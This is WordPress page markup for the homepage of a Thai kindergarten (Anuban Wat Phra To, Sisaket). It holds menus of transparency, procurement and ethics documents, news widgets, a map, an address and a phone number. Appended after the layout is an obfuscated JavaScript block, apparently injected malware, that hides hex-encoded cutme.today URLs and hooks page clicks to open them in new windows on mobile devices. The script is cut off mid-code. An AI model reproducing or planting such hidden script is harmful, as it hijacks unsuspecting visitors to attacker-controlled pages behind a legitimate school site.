titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 